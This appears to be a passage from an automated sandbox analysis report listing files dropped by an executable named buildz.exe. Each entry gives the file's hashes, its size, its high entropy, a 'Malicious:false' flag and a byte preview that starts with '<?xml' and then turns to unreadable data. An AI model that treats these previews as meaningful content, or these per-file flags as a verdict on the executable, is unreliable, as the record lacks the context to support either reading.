                        SHA-512:7B8AD0AB29A03F3CAA8464900A2E933F4FBDFC2BC0649411058B0893C64EAC887714A8B8ED75E2F2D91723835F42DFFD7664F4541D703713FC0DA797C49A0A88
                        Malicious:false
                        Preview:<?xml.K...<..I..J..r.[..?..!_.r./...."R...=.....:jcN%I.h.JB..-..T...6{-.A....j: ..M.M..=..".dB.O5*x.V..1..2hp...1.<..6J...Va9.o......._..&B..}.:Ao3.$5.:...a8..+Y.l.8...Ijs..R..Q."y...\Xj...Z..wN....k..~o..on]...>L.....5`-...9..Jf....-'a..U<.U...N.....u.......J.......`......qpv&.o..Hiw....K.C..Vgi...HIE,$....G.P2y5.;p...........eP(.p.r'..0>..1..,...wQK...J..`1...:..0.?.,..Hq0Z...!.(.L.h...r....A.....x..y...N.;..n.Q..d.v..Ff..Z..........D.VA.S.#.|\e.g.-.i.E]z.......je&......7D.U...C...y...._....M.Er...9...q.._..n./.............q1&.r=..}.@.cKw0K.,...4!5.(.._.D.t.\.!.......xY.{#.Lq.1....1..[.F....&.6....u.....J-...~..-.".Z........P... ..p..Y...k.......Fw._a..Sm..u.....b.C...T.....T.}..1$..t...mq0.;.S.~..P.S...`.K..2.e.z.Bs$^.......?..a3..Z.&E...sWb.f..".K..W..R..y..{.}../.....j...Q..|.$.......F.egHcXB#&X.9y..W.AC..W..P.S..J60.A,..Y..pL..(.Pc..:s....&........w.V..D}]>.[.bW.)%)Bj#......j\.Z....................T..z..+..H....wrf.z+...]..i.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1747
                        Entropy (8bit):7.885770101220553
                        Encrypted:false
                        SSDEEP:48:R5IA1psIONUtyVn766W5JhYuto+49268A47F8xNzWcUD:RZX3tyV7G2uX492hA4q9WcA
                        MD5:A9F69D329BBDE5E5ABFDFF4740044486
                        SHA1:B50A18144F08FBD53256A99086B519BC45E43607
                        SHA-256:D843F9A592022F35DFD4D0A5160D2C07E2470A42D2DF0C4FAFA8EED99A39C27A
                        SHA-512:EE18FD3B1FAB176ECE39B13088E24D440030CE52CFCB1200D32451D8D1F48830FE01A8F2A6D1BFD23025761A46F4EE306108D3637BCEF7B410EAEBD2D3C66F3B
                        Malicious:false
                        Preview:<?xml...7.R`Y...O.......x..=.....Z(.p.,./.e.{..P}.....xs.....2..7s^in..g..d....y..h^p#..$.Eo..`.w.U.q.......p......X.=......mS.+...L....+...4.....?.<....2....X.Y.].S..RA.........m..l..u..'...O.(h...F..Fu.Vw4..=Zh..@.Su...../$..F..d...y,..Q..\.Q...G.I.....)~..Gn.....t.`i...<.....j9..A=q....c.../...3.~.mB.<.i.......T..Z.D...2.nVJ..o{....A..U.....g..,_.+.Ho.......3...[.bQ..pcw..R...{...3.c....w#.E....07K.i.B<.xn..".+wP....t....n...(..v.X..J.a(.. .....[........Z.WTM.L2..i.Tc..C...Np...^W...\.E...q._..t.1.....d.....Z.)...o.i...ynn....8..9~.}K.H.......S...V.....<..!....]....c...]...6N....m.1.....c.....i...8..._X....v.m..'_.bJ~#t$.G`.R.(..v[`......x.c..P.q]..$.....z..vK1}.b..&.....&.*.gs..O$kk4>.5?[.l*aL.~..T.HS.c..."N..%...-.Q.J='.B...6Q...27h..R.:.#u.u.9XR...y..v2$..F........P . .q#...5.E....H.....]...%....h>.|O.:O.`.z...l....W..x.o..Z....Y.Z-.R..6..7.a:JMb...8...&....ra}..T.M=H.*._^..8$...m..\f..V..-....7J.y>IU.zy..I.....].1..c...A5x._..v....
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1711
                        Entropy (8bit):7.85814281763651
                        Encrypted:false
                        SSDEEP:24:dS8CbDPdPV6YfbqVSleDGnf4lQ6Vrpo9QMQXPg95B4jzz/Ii5fGbD:IR+YmUlaGfhYrphF/u5B4jz/5fUD
                        MD5:520D3A9A6E4EE382CE735A91F1A10BDC
                        SHA1:05CB9615A7860B825DFCBCFE931FFE0D90CF9C60
                        SHA-256:54041C9C84BDDCF2F7CA1E41D37F8B327BB810D627F17DBD40764EDD0FE2D893
                        SHA-512:8C1BFBFF7D03D079C1D367B6388767FC44A054E7D4C6A0C52C1DE3F494EB3C4F0F4180F611D5F484B00C45094E5C214F4110A8F838104B8BD71139AB7AD87685
                        Malicious:false
                        Preview:<?xml.I...Ku..x#.,........;v...YN...>l.qc.Y....&.....}M..D-........F..L.7.W...`E..!.I!*.....9f.gs...<...g.,.....$......z...j...~..6......Rp[...sV.....;...Tw.. .]V.. ........cr....j..O.!...,.Qsx..1.[..% ...P_\g...7]]SQ..T?.&.x.4.6....4.E.xva...[.k..grW,=..'..(..L.2.p.y.l>......5R......H.C...O=.I.;Y..&..P.^..4..S.3...2...n.~Y.;.."......4..(.?...E.D...7-...u.q`..'..A..<N.~.{..P.lQ..h.L..xt.."..8x......!.k;....6..J..L'.).=.L...t^f..^aK......q........t..;5V.`nrd.....;.1.!..r3q$..4.)A...l........j..q.V".(..`...u...`.....Y...Y.h....`.j.....KZ9.E.?..<.!n../>.H..U.._...j..l..>.Y.3p.[..;Ve..(....KuI&...D7..%..Q......-_....D.....x....?*.....U.%nV/.d@.!....z..c..F._LD...i.-.j+|_.|.N..V.f...c91...?..._..T.hy.|...-(.L'iy|....J..K5........O.6p'5.l.. .c...j..*b.h6G.......'.Mz.......+f$.............[%f.k\...C.?.g@....n`q....h..a,.M........$..ti .f.S....4.....Ll...a.1..[..l(...O.7I.e.."..n.E......t."h.qC..z...[y1...\....j>.y.I:~eX.F../zY..h.&...Q.7y.$&.P
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1748
                        Entropy (8bit):7.881642981878898
                        Encrypted:false
                        SSDEEP:24:hb7/WhuZY787TgNu/vkEQ2tT5m16uhswJ35g5C0kWk+U0PBrMdPEqE6bVFdVbF8A:N7ehuXgwvkEpOskpgW+9lqEQVVaUD
                        MD5:C51B4D3A863359D6A0E2F571B4430ABA
                        SHA1:2DC6BEE9CEDE20ABD185167D8850753176F73352
                        SHA-256:0BBE57C09FF5D631FA5D24025A5761862269006F4BC32D9E4AC5C73509786B40
                        SHA-512:2535B73632798F130B56E6A0140B1C2EE92ECD76D7BAA8DF8634561B3AD2B0665EC46527F35C2F247032F2EA036F9D692096F25AEA08172E2CEE3EE00C450D51
                        Malicious:false
                        Preview:<?xmln...1r...".B!......8M....3gB....X$F.....H)H5.F>s.yr..#...+e.V.}RR.([..2k8m.........0....G..%QZu#G.fT..:...1....W..C.........a..y...,.OS..8&.z*.tx..aa....;....HG...J.......e.|.~DO\.x(c..nwx....V).R.4*..t.Z.xM.L#L..Y-..1p,t8,..$x+...n`.S..P..:F%h._;f.{.]......DR..).~1.c..E.j...`.....On..].M.@....[....x..xC..v.eF.H.J....Z9..|P.{[..(.y.`......-.D.-2@I.o.-1....BK.Y'j....<6...:...7k.h9>S..%`.S..D/....I....'Z.,L ..7.G...!b....?..b......~eR..<l..WPI@..lT.v..pJ..qJ......\.........m..l..:.......Q<..."c.....nR.Q.....&..m1...I.f..]+;...t..d`zL...:./...3vL."*.E...|.....5.\i...}4.'......@...........*...n..b.$a.K...Q...Q.uS..F}.e.-....C!..pA...,*a.."D#...}.WR._D.'.....@{ u ..7...w.&1.....|.6..wX...E.5.-..B..z..jh}RM,...@....#....*..E..4L..F4./.......:....N.t..*.....=..k.l+.r..H.t..Oq.,.6.o.C..F......f..u.l...a;........n-..|...j..O.z@.....9.Y...(L..w.....K]..{P.|L......H2..T\-AD.L..J...(..R.H|5.....AD!I..3W.q<|..^..`...o.b.....v..,...7.6....Ab......H.V
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1704
                        Entropy (8bit):7.8742621304961
                        Encrypted:false
                        SSDEEP:24:ga/y6lM9Pni35zMzmK2EXmNLTfpOHsBblItD7IEe6KhhEWB40ewyLrShQ4dbUgip:ga/XlpJqWxTbl8pNK5aP5AQSW0UD
                        MD5:A6C41ED1D569DE94F2071293D549D218
                        SHA1:52518131F1CF0C172B44F74DC3DD57AA23900D3A
                        SHA-256:FBB2FA937FE84D760A92065F733F13532200DAF727682151FF5356A79487C320
                        SHA-512:C5138DB807AD302790CB4E7258A3B6A5D9447AE0162CC87677DFD142D55C7A88CEF19F00B74D3733CD8490F37F07BE11CE6ADBC47EE27C69A100CDBF651547BE
                        Malicious:false
                        Preview:<?xml..=..$.?3~.....z.}..i.....K....~.....K0.Dx:...-...|JW.%d._%B.6VPx.........<..YsE..H..,..w.....T..F....]...`./.|G3.%....'.....d..u.Q...m....S@._.....`mQ5..\....T.._.....}.E..y......CE....<0..0....FRE.LG.bQ.......I..xi.!e....b........:.l...u.O3...t.Zm.)..]...C.........!g.r..R..3...0..........X..Q.o.z..q&..N....2.V..\....".bBm..................(.......T..y...*......4..t|.${.....G<..R.}._........].. l..e...*.?.{.&7....nB....P.&.|C........>h.[./'..B..a.fD;....[.%....AX.v..0U....{(9.:...i...v,.q_E..7..+8...S......$y....f....i..]..>..:,./..9..e.`.u.hZ-lt!U.L..:....?..tv.tz..M..d.,hb...6.7.BZ.VSl.............>....b.R...R.J...=C....G.....j..clem..rd.e6.i ..?.T.....R..Sg.0...,.....W...._.V9..]......x.(p.{..L.h..X.(...>....n.9.|.gs.fyJ..\yqV9tB.....d.8..{.}T...bn.,Ni.$.X.Y.HN..Z%...n..^.............."....%.Mp^.!.p.c...#.X..GD.u..7C.l..]_.}._+...FZ......N.}G5u.l...^..r'PC..'.I)....?.3.#.1s..,4.z.Q..]q?...Cp...e.I(^I.W0/.,W...-.....Dj..e.jbK...f.ml..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1741
                        Entropy (8bit):7.876957678771639
                        Encrypted:false
                        SSDEEP:48:xY7h5bWtuDxMdz/t0JRUUbmz8v+hCNnr5TzZxNUD:x42u6t0/f6z8v+gr5fZHA
                        MD5:1862D984931F5DE6FFA91C794FFBF0A6
                        SHA1:B7B22A22FC8033DBB77A3D2E9F1A502CCDF621C1
                        SHA-256:F6CEEE816A99EC19836227ECA0C545973024AF36E5EAC30A817A87B982EFFFA1
                        SHA-512:7448949420159C05F2D2C8ADB780995F07A4C9A92C54CDBC4EEF97E0F9A15091A9A054CEF3A11DE0602CF048C8A2CDC1FD8543AB2B010274A176C5EC46D84B30
                        Malicious:false
                        Preview:<?xml".G....~+..$...U......6.I# =.f.."....|./.)Y...[,V.&1.....I.B1.bb.k.M.E.$!........}..:.4.G.[.;G../`...`.,c.&{j.t.....^...eU. `...}..Y.Y|][.#^_.76...P..1>..y.VN.:...`-.t^...z.d.....'c(...V...b~!^Wa...(E..B.h.....;.K".......!.SZ..;.Uz2j..Vt5....qVZ...N.f..._H..a-.......dt.....h.........u1.c.?..1K...R.8.....jCpe{z(O'o.TY..v:...pQ..n..%I.j...pE...j...AA=78...R.X4q.,`.~.Y.+6..U...0..fN.j.%...............Z_.0q.L.DY..>..08....q%0.&.8.E.....G.2....."].....t5...?k......Hd.w..5....6Fk9bb..Y.5.:...[3....$..t.T69.....U....qA..l.......'.....Lh....0..~B..R.IDX ....Vp....&L..../..uY..\.+...G.P&=..\....F".pz...jl..N...A...:.+..]C.or........Z.X:.xA....w.f..,.)..."...8..l...2[O.2..r.....M.CqG.Z..IdQ.....<R3..b.>`..h..>\../9.......k..i)[.5N..T5...fv..d..Q...\.*7....6...K.4g.y.....`...C.KE.\...b..E.......`....:........e..%.D.....(....,1.u...X6U/.....j.QF...V..e.2....`....gBbiH6...'...g].q.Evt.Bj... ..]..3M..*.P..!.it.l'i..N.......B.j$.q.?7.e
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1702
                        Entropy (8bit):7.889902308077255
                        Encrypted:false
                        SSDEEP:48:F5YA7fwYlqslP87FZmiaKG/0HbWn9bkRyQvDvoUD:FFMIzzj/LetMA
                        MD5:D646F58737BE217B7C46459710AE6770
                        SHA1:EEE8D4690ACD505995FB376D093C42CD338124D9
                        SHA-256:874E6A6BF0ECEC4784E3D69D59DAF12C4B3D7BB6D3A2AE5576B0CC45401F1A4D
                        SHA-512:8E3FB8C8A601EC35B1E8662D41037C6E6FCF1C95F47F1FC06EFA84B21476C6A9359B22CD74A0471030177EAFAEB94DD41FD5C7BB6AFFC4D62B272E821605FF3A
                        Malicious:false
                        Preview:<?xml3..>I.uq...vZ7q...9..MZ....&..e..$..d..i.2.?.nA.r.o...$.7..:..z.v.wx.G....j...i..o..f..v..a.t.4..V:.........v}.U1..3+.=J.z....).QV..+$..f......b..&..4.@....?.<.#..+v....E...0..9....y......;.P.5xwv?/5.........._iJ.wBs.......Kp..%...l.`.'.......@s...3.H0B..W.(0&..YMywJ....{....jm.79:.O......x)+.?....l~.Sb.g...N.Z.D..P..#....b...u.J.......... .A..{.n.,.c..]B#...q....j(.*z8....E....,...I..=.t=..t~.^...._.....*,.}.Z_..n;S;.1r.t~...4.~1.....C.k......K}..E.0.L.4y+.^..h.m....;..].......@..'9..T..IA.K.8..QS..>.p..2t.]Y.y.@.i\...R.W.T.._.&*.&b...'.[g....{k sg.c.h70.$......a....$h...q..AG<..}.(..r.<.v9.:....I.S|.....t.....I...0Pq....~I"$.1..6...4.2..Aq../`.Xs......m .......XE.O..Y.M...<~.Y4=.....dB>.+1H..x..._r.".7.^5i.Qc.....S7.*:Q....v.?u.HN.|..ZV..R.P....?..ik.J......g.....#.L..K.R.D...V....V.:.v..._..h..R@!,..C..V..LPx.S..a.KJo.2.c...yg.=.~s.e.2P<QN+........UY....y..^q..e../....".^.....$k..C..s.o.._...3..p..C..P..u.....[..s....S.-*...{^..}..3p....=.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1739
                        Entropy (8bit):7.886097486841004
                        Encrypted:false
                        SSDEEP:48:9A2wW1hFLQoiaYvq2WPCSoBlO1eJunOc+59UD:9UW1nUoi08uOc+59A
                        MD5:5EB9F979A8F8A253F0232536246F1BC6
                        SHA1:45346E927F9677EAFEE7F476EBCE249E7A3DC842
                        SHA-256:7A2434ADD37E6D9A02A542FE21322D46C66458DD180FBD76ECC1A95C2076C557
                        SHA-512:680D980A7373552AA95CD3B5294B875B66916E7CF0EAC852B77C47CDB0EF9AFA7A6668142A31EA2DD1D5B29C795B4ED2A471AC07C293683E93C4BB04297FC397
                        Malicious:false
                        Preview:<?xmloG6<i...L..._.t..u...HQQ.....f.'.O..[]r=..-.|....v.D.Dy....8..@..!...8......s.c.;k...N8.....O'l...#=...`....@...mX.&.G`.R.+...T.j].n|.e...._-)....K...(j.85....?D...p9.t..[.<L..~.....7.22..j.-."pO..-.....Q.....3.c....k1L.@.o.Z.M.@..J.\.r....yf.1.T....?.T..5..Tk+\l....V..}.m...8..2.....C....).W...g~.cNs....yI.._......:.'$...f3..;.5.>...3.=gr...L......F[....}Y*..`$.....y...g.......2.U.=..J.Y....~.{,..d.2.....T. (:v...M.u..=@m..@.p..H,.i.C...v...N..).........I.V.v..p....TY.lj_!..1.w..I..f?.X...}y..7.l...152..uX...8......@4@ub.......,?......4...d......eo/.V]'6..p.:.(...F...(.....N.Ci..]H/.m...../<.._.@.P..g..Z..~z)A.. ...R."..z\~..R......I.#.m'......o....?...B....r.b..?4v._nD>=J..8U...s....1n.......2.|.hO.....>....O.;..}.nU.._d..[.,.!....Z..cL.dw.;....zhaa....A.n.s...d-L`.h.~....s)B..!^}.3Q......{.....mh...\.D........B.g...G.....'t.m.......'pG..1m..2.a-.P.....l..-....X..u.\.n..vG..[.....4..7...%w...h..-.E...,7.O.pLWP.../....g..:dGy.J.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1695
                        Entropy (8bit):7.874261065531863
                        Encrypted:false
                        SSDEEP:48:OrOx+p1W0qd5PDMvKsNFZRFNhHMMjqgFI+X3Cfr/3EZ138dlUD:OrPpETd5P4DRFPbs+XSfrMZ13SlA
                        MD5:ACFC2CFC0A944E77D0FB7220C8D4D632
                        SHA1:057D21E3324915EA1CFBCB248141DDF84AAEA762
                        SHA-256:CF35FAAE8BFE9CC087F986ED62FFED0C33467E651F11D8831CFEA448C44F7B46
                        SHA-512:27C2B81A1437E497CDA308C6D7565FD467A5FB7A0AEE823643F52AAC7F29770BA5AB2A8FEEAA2A7EA5FD83DCBB79A6368E3D0E37DBAC2C7C4AAA2C6584EF8430
                        Malicious:false
                        Preview:<?xml.d.P.....z.4....-..]...`...8./.e{.M ...U..)4.3..L..}..S..~...'...tY.,G...w....P....;.-9u.(6.G...D.`fyB.^G.v/fS..(...a......c.8n...8..D...T6,.y>.`C...P..@...d......(.-..r.b02..oi.....(.fd..B...8..~...jh...x..Rl...y..>.........7jv>.u...c...%.q..h!8..2k.d!.T..9...!#.pG.|H.....{A....t*%..._x.)R....H..E.....S.F........W.&. n.....}y.qf..H.Z. ..X.I.u......y..XT....+. .~..4.vl&"n.[G..p.#.]...]....p3K..|.) .S/4@.^...0.10TM...(....[...]F.......A.....^E.0..:..xnk...Q.....[...;...~..;..._5/;.3.....e.|.....nQ.\;.m..z....u;..t...:z.Q.....L%..n..*F.l....M..,.>.-N....#...m.7.2_.).....d...N....BF..U.b.8Q.N`.Mj...T..*Dwv...M......TP..6..B..O8w.....Pa.'D.?.g.B..fGR..........J+Xc{.Q._...p.hy.N0.<....N!"Uf_.B.....r.......0.q*.:V ..6.J-.=..$....\...k&?.j.k.s>.N.u......7....2%*.E#.U}l.....^..e`.n...~Bd....)...qB.xx......<Y...6..a....z....Vf/5O}]../.q.S....9..7Q......j..xey>.!..@h{...Wwb.`.T,r...>.D.5......W...!.Ek.-..........J3.|.P......".HA..`{K.}....dn
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1732
                        Entropy (8bit):7.892744469089587
                        Encrypted:false
                        SSDEEP:48:pkd9zu6KP47A9qIaLEbBdiOXmwnS+0OUD:pU9KZgc9DaLAsOX1nS+RA
                        MD5:A3D4D9E3AD75418EA3594496A0B4CE1C
                        SHA1:D2EF40D53E5E665F540C170E609CE2A3B9F2087F
                        SHA-256:7AEF63E258FA502E11740C20E133DADF0FC4A79F03E169D4AB59E5963F6E2A1A
                        SHA-512:8FA5039739202FEE4745752A51F3DBA00C3C18CC21B33510EA775FC4E7553FCC81175FB963595930F31DE29148256D8E2A5469CDDAECB3FB6A19B6D763E19CB1
                        Malicious:false
                        Preview:<?xml....r.3...2.a..+-......\.X..0.9.J..G...8...".go.f.(9x......1.Z.$V..u+]....Lm...|..Z......O.SF...,...,..0F......4SQh...M..'C.'..u....Y`..P.(.|.r.4c#d......@..uX.4K.05&..<....g..S..O.q.J.=1..j....%R..e.....R..[...=....'........p.Cf2O......pYr.........'.$..z,TEb.b...<?.ep.j4@.Nq"...!@.af........-.....f.u....n.....E..Y-.A.\.w7.....}..`K...g...f...._6.lC...Y&{...N..~..&.QZ..'u.E>?.2/.$.Ew.....&.8.....C.-&....??x.......u@*.......z..F..P.].e......J.....^E'.;.y..*.l...`..a..I;g.5K1...:..S..m.....9_.0..........d\..v9;1.....5.&Yj4.-'..<...).W.h.).I..K?.._[r.G.I.@.89.yd......L..d...B....t..6Q...C. ..=T.J~.<0...k(,....0...\.t.....4P'.?..l....H@....iq.z<{*..+4..7.......t........).6.d......i[.'.d.....%9...........*O{A...Qn..l<...|J|^..8(..z..X..&..Cx.iv..g.`<X....C./.....F..._..........C.U@.{W3....e...x.T..v..{......[...k..5.L......#,~......%.....J.....to...;5..N'...w......s.N*......H9.I.U.3_....j..=.0E.(.^.9.....U8..!...1.....M.a!......}..U
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1707
                        Entropy (8bit):7.871940405629235
                        Encrypted:false
                        SSDEEP:48:qUY/jlEFeT2Sstv4D3Qz18tsBfN1w2zwb5j7OyUD:qB5ceT2Smqw7kMyA
                        MD5:59874DDA5E261330C1F4874B1FE5B5FC
                        SHA1:5CF86B94DA8EB39FE2025D628CB72E037BCA9BC8
                        SHA-256:F41D3BC56A372B68B2E013FFBFCF29A0EBBCA102699AA361AE8271206F9CDDBD
                        SHA-512:341C1FCE4B93CEF7D53201B331A2245DC8DCDEF75602D76F2C92DC1023C2CCDBCFD55F3D72B21E29880E5A13084FEFEF20FE08D1B3D67FB6704FCE5C5B704879
                        Malicious:false
                        Preview:<?xml.....].g..?.=X...s ..q[....[.nc pd?..\.Rd.NHj.N:..&.y...w.."$./GA._....n..wS...Z.T..Y.S.i..q.@.y..%.D.G<CM..)e{.E@Q..a.|b....-....|d{H"..E....*t.B..[G$.)@.+....]..\S.*..k....)..$.`]..3\...9..L........MCL.fAF....C.]T.P.........c_7l|.c!..V.k.].....[....V.v.......V".&.u.x.Y.$.A..gy.E.+.w..`....q..9.e......zH-d...V....i.v......?qJr....{DF.U...V..ZTW.&..i..&..._3M..,..ObO7...~3...].r.....m4....eq..'.cj.qx.Ok..n.C.Z.4:...y.: acu.~.qh.....u.....P~..x."....r.lbb.....)...D~.}G.J.z;|L...09.A....E....~.&.`...~v..7....peA..?>...J..g ..k...0b3...2..P.@_lpq))..G?........5b\....=!...J.....<.......WGn...P`i.P.....(=d...\P.S...O........|{...2.aH.^..[..f.E..a.1<?D.T..^.a...3...'......]*...\......u.Wg.....I.N.....{.0...........g.o...WQ....AO.:Y..|.A..YP..v)DK-.9 ....r.g.}....a..Sw+...D.A>c.)........4.A-...w....7..)%.!..5...s....DP.^...dM......z.V......HUQ...[.F.bb(.P._.@.S..\.$......R.!5...(...x.j..3M.$.'...dul....s4.ndD."..qH.....RE..^%....r$....[l...
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1744
                        Entropy (8bit):7.877838176206269
                        Encrypted:false
                        SSDEEP:48:FwYmIEiHlCmfY4IcHDA6C7v8wi/E/CiWWak1TiyhuaUD:FFEuECIcXCAVcW7ATiEDA
                        MD5:217447BF5174D542D29B0DD4413D26FC
                        SHA1:E33AA6DBAE4CE303636A2C512BEAF655772796FD
                        SHA-256:FF230F0DCCE02E71985E575CCC232DDF9E795313FC15AAB0D4AFC6CBC4B65CD5
                        SHA-512:3894899ECC048169D4F6DDBB1501EF569F214199E4E815CAF5434B1B7736BE35CAEB01DB55C286D2D42D04231C315D3FE3CE64A0E0F5C7AECC808E76059044E7
                        Malicious:false
                        Preview:<?xmlg..W..........^....Np:A.fTGx >..(.b.~....ml.U</...|...........c......`...H/.X.....(...(......F."M.M..Ext.W.2ob<id.......L..T\^..UK.....,J..V../..GL....!..sG.d....s.. C......W.a..G.tf..+...hw3....NRF....+.....r.5...Br./J......7.u..+.?v.E|V..'.R.....wv!,.].L8.....J!..=...<......3...c..I..[T..U.Q2G.{..$i.i..maF..m..T....Z..bu...9.6..)jB...: .O.0=.........5.W.z.....o91........l.m\..w...U..H..HZ0.....(...#..WU.^.r@.......A.&x..r=..x..)/?...L............x.P...&.q..I..Q...|..8.Y.|..V....*...\.hL....J!2...n.^F..Z:F3e..^.'.p .`..hAB..".)Yb=.m..!..NY...j.!N`..`.@..Z<.-.:(.\..htI.f........q.;.M(..|...S.FC{..... ....7d.Q._..o.....~..v.%);....o...$..f>q...2...3....L...s.j...<...s..._...a...O. qjwR2.\.qF.]...v...2.....j-D.5."..b....'.....g&B....(.c.}...`.)6.,L.H.p....Rg._.......O.O..h(_u....%._..D..D..n..7..Y.C.:.K(dG95....x..../.....>2...x..1.B"....w.s.....0..a.LKC4.ap/1.,...|$...s;...g..............:..1.^..........?....i..M?...(.y.=.z.=..7f.1........
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1697
                        Entropy (8bit):7.889220044683972
                        Encrypted:false
                        SSDEEP:48:9HLZQqhll157XRogG6tYsRHv+ZejWC1HUD:99/NAgG6tpMcpRA
                        MD5:1C75778BF6E73DA6B417C3595CB9F690
                        SHA1:E5E29DF0191113F00D77CDD11FF6CC3F996215E3
                        SHA-256:AC04CEEE3729B32C5E3621A384E9453ED93FD5CE4C58916647F10D7CD7F3CA4B
                        SHA-512:4D20A591F34A54D52CF73E0EE2C48EA3A987D11309DE4978DF67709DEAE99AB63C17DC295A71EFD2B5E2BAAC1F0FE1BC316D754D3D62CD6B62972D01A267AB9B
                        Malicious:false
                        Preview:<?xmlg..<MFI.g..>7|/......7.S...|....W..Kx....J \.......M.$*....Xd...Fs.jg.@.fjQ.@..b.<....4R...L.E.g.......C..J.~..E..!p...R...4%q......'-...kn......]..t.Q].^.tn?.........\4B..o....h.`.|$....[..~.;..]'.TM>Z..@.......6...J(.wZ.....i..rm..w;...rze5..B....P...;.../..:...e.....b....$...z.HP6...].2....YTo..(..k..m. .&g.Qf.K8.vf2......d.[......2sZ.G.$....f..>.....P...E..wD#...*.1..HO.|x....9}.o/..L.....,....../.@.w..?C....p...#5W_.0..:...zK/.I.!.k2.}?`n.7.e.=.Dc....O4v4.K.qJ....g....D..%.0>2.X.C....!=...}...[...A..|.Z..".'..zl.WM.y9".B..1.9}7..;>g...l.|.k.vU]..j._9.bT.ZCVzX....%r.^r#r\:.....Z.+a..o#lN..[........."....._h.4.r.Y.B@....s..#.,......?=.5..Nd.(.r.4.jM..>"..'VA6 p+....b...fQ]...5...../u..{....j..S..=.@b58x.FW.....TG.O.)H.6..D......b,...............s.D.7X...9...$5..z........?..o<'.}.y..R<..n...F...~|..........qp)... J_.r........7.Rtl...x.)=..{v...V4}..N..}....L..r%B.........ZEa~.A'3.......(.p.X.{I....^..|5..4. .8...kL.B....rX...
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1734
                        Entropy (8bit):7.881689341377328
                        Encrypted:false
                        SSDEEP:24:mQnSxzCBH23ptWS7efU/CjP+1A0jZ2QYqL+s4jNuVhMilXYx0OzzBSAzcdDbWBJA:TSxzCFgDTCCq+1wQz+sm4V9E1dSteUD
                        MD5:5976BFA68B8179895BAF90152D2CBF08
                        SHA1:FF67A63281FC3A7E57E154B6F487DD330286E479
                        SHA-256:241AD044F446A31B1DFE822F762FE2D67509047F81F6B58D8BF2BBCAFBC14A5C
                        SHA-512:DBD88AEB133A0C6E3BE24425BA156ECCEC96CC49F97663957F9EFABD6B5A4EFD922788303F5D74C4D34CBB839F5C0DFEC6595E9677C413A9EAC7BA83A9802184
                        Malicious:false
                        Preview:<?xml..KH..Y^<.....fO.8.n.....m.s..%..Nw..h..m........yq..D.c}....0.%...^.>..............w9.Sv$..U.77.h....i.U.81,j_.e].ij|rc}.`.7..Z...%..=..q..........B.HCwc.30..I..l.EK/.G.U.}I..=...z......8...(.rp].K...u..!...77..U*.[UxZe ....E.u,.B...2...5 ...M.|.bHtvPM,....*G..\.B.q].p .n)4.....;.1.c....sQ.SB<....C!.~e.{.O. .C...sS...t..Y ......O}.Um...D.4N.....a7.....L.'.'..L.....>*i...J.K..R...m.5; he.4B).a_..t)......\..../.D..g..a.S,.....t...t...%..l.'.....?.E.,..M..[.I..2v..D/%W.....S.[.Z....).El........e...I.uR.2u.:Y,.0..i...1........KA.8.....X=X.3..H.'X&...*.-.N..bD....p..k..%)J(.?.=.d.q...D.B..r./0...jO......./......3.-...M.>T.z......Ek..q......{V..M.n...B...@d...wB...>..B..\.(|y*...c...S.e..Q.."....S/.B.1...j..g.....(..Gd.}qD5...+".Y&.N-.AfO|.....dC.A.}.|...r...%:M.7.|...C.<...2;.H.C.t?`\..~<Ra...s.Y-..6..s.]+}....a7?..U(....L........!...N..p...........c..#..f.>(3.......@.i].H./wD.H)...g.a........V..Or.i.R)..^.`..{..(}IHzi...%.:w.,..i.....|
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1689
                        Entropy (8bit):7.871929435718143
                        Encrypted:false
                        SSDEEP:48:12TMMTJD8BvNxcOKhpBFY/FkHuibFTLRVGnYG5UD:1SD8B0XY/y3XGnTA
                        MD5:5F5814075E2C99D3FAF3F46B686CF1E3
                        SHA1:AFA8FC8EEEEF6A0ABB5359869F8E6DF474DFB1F0
                        SHA-256:CF7F8124A195C72D6AF893CB7AF6ADE125028B7ABF153D0D31D16A35C98A3891
                        SHA-512:D6D63CB1370BF25EF394C38A65E77ECC4753BB7A04F3A1337211FC033F84D9A5FFC298DF5BA0091D99B25E255889250FC416A5417C1A8237CDBAB63C4226D6DE
                        Malicious:false
                        Preview:<?xml.O..".P{.4..`.^I.?..S.q...E&A......B....)D..6.k.j!.:.Y^/...6....,[.@x-C8..e.oR....+.......~{l....]5.)....-QG.@sLK....8.K)N.C.2.6...I.}o.S.....~h...X...^M..%....$k.s...C}.f..V.7OR..]b.+L..4.]U.......&...N@...Z.\.].........)..fY.(..q~y...S.%..QW.{.]...(y.{f...K1S{E......a..c=.t.SR.....V..U.^" .-%.....?.^.....G2+...s..(.U....pZ..JV,.....W........z.\.x.K.v?.c...$t......h.>...]]...........0uhv..l.+9.k.3'0...&K..#sq~....A.T...o..9.F\p./..na.........2.T./....S..A'....=.%G..........X..k.j.k.Ua.|...X.O|.."..........6#.<.>..B..%...c...C.+wol.%..f?_{.tb*.aY(.\K....:4.x..T.GH. 